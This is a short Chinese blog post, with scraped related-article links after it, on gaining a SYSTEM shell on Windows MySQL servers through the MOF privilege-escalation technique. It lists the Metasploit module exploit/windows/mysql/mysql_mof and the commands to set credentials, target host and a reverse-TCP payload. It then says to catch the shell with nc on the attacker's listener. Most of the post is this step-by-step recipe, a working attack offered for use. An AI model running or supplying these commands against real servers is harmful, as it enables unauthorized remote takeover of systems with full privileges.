鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权

metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网use exploit/windows/mysql/mysql_mof

set password xxx    //设置登录mysql的密码

set username xxx    //设置登录mysql的用户

set rhost xxx       //设置要登录的ip地址

set rport xxxx      //设置mysql的端口号

set payload windows/shell_reverse_tcp    //所使用的反弹模块

set lhost xxx       //反弹到的ip地址

set lport xxx       //反弹到的端口

show options        //设置完成后,使用该命令可查看设置参数情况

exploit             //执行

如没问题,即exploit执行

这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行

错误之处,敬请指正

本文出自 “z2p的博客” 博客,请务必保留此出处http://z2ppp.blog.51cto.com/11186185/1975993

mysql mof+metasploit反弹shell

标签:mysql   提权

本条技术文章来源于互联网,如果无意侵犯您的权益请点击此处反馈版权投诉

本文系统来源:http://z2ppp.blog.51cto.com/11186185/1975993

mysql反弹shell_mysql mof+metasploit反弹shell相关推荐

  1. mysql udf shell_MySQL使用UDF调用shell脚本

    前言 在最近的项目中,由于需要使用MySQL的UDF(user defined function),这个特性从未使用过,而且个人觉得这个特性以后应该会经常使用,所以写下博文,记录和分享这个特性的用法. ...

  2. 监控MySQL数据库的主从状态的shell脚本

    本脚本来自有学习阿铭的博文学习: 在大数的互联网公司,其数据库都使用开源的MySQL,其架构也是主从为主,所以监控数据库主从同步情况尤为重要. 提示:本文中的S全部都$符,不要问为什么,马云爸爸的社区 ...

  3. mysql 备份库的shell_linux备份Mysql数据库shell_MySQL

    linux备份Mysql数据库shell_MySQL bitsCN.com 欢迎拍砖,详细内容如下: # MYSQL 数据文件路径 MYSQL_DATA_PATH="/usr/local/m ...

  4. mysql mof提权原理_(新安全原创精华)Mysql扩展文件MOF提权详讲

    本帖最后由 阿甫哥哥 于 2016-8-8 17:24 编辑 哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了. 希望大家可以支持我们,我们也会做得更好.无论是 ...

  5. OSCP靶场6-Stapler(用户收集、wordpress、SMB、mysql上传文件执行反弹shell、用户历史命令)

    目录 步骤 0:目标发现 第 1 步:TCP 开放端口扫描 第 2 步:TCP 主动端口扫描 步骤 3 主动端口扫描的初步审查 TCP 端口 #139 (SMB) 第 4 步&

  6. mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)

    ### 简要描述: Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它.这个漏洞 ...

  7. linux 下ssh端口反弹,利用ssh隧道反弹shell

    说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...

  8. windows 反弹shell_容器内反弹shell的51种姿势

    什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...

  9. dz mysql导出shell_mysql数据备份并导入数据库shell脚本

    #!/bin/bash ############################################# # #           mysql手工导入,qa到dev # ######### ...

最新文章

  1. 基于TensorFlow的简单验证码识别
  2. java8中的函数式数据处理
  3. [zz] 几种类间关系:继承、实现、依赖、关联、聚合、组合及UML实现图
  4. Python过滤掉numpy.array中非nan数据
  5. MySQL关闭查询缓存(QC)的两种方法
  6. IMPDP导入实例(oracle)
  7. tp5微信公众号获取用户openid_tp5+微信公众号获取用户基本信息
  8. verilog coding style_韩嫕:坚持coding
  9. getData 函数
  10. “开房信息泄露案”开审,“B/S架构”酒店管理系统终成酒店大患
  11. FFMPEG使用摄像头录像并编码
  12. 计算机控制电机启动接线图,电机控制线路图大全(上下)
  13. Android开发初体验——创建一个简单的APP
  14. 湖南省中职计算机应用教资笔试+面试心得
  15. 理解LaaS、SaaS、PaaS的含义及区别
  16. Python中用fabric库来远程连接服务器
  17. 树莓派使用摄像头——fswebcam
  18. 对激光原理的初步了解
  19. 进销存系统_用户信息更新密码修改(3)
  20. std::this_thread::sleep_for 使用

热门文章

  1. 在url中取ip或者键值对、手机号脱敏、电话号脱敏、身份证脱敏、银行卡号脱敏、身份证校验
  2. 写给张琴 2008-12-13
  3. 怎么设置自动提醒客户们的生日呢?
  4. 一对恋人分手时的经典清单
  5. 积分系统方案-关于一般积分系统的整理
  6. 细化迭代2 实现销售开单用例测试报告
  7. Notebooks 3 for Mac(多功能记事、文档管理)
  8. win10如何清除ftp自动保存的账户密码
  9. python call函数
  10. python:输出<=n的全部回文数 (高教社,《Python编程基础及应用》习题4-5) (15分)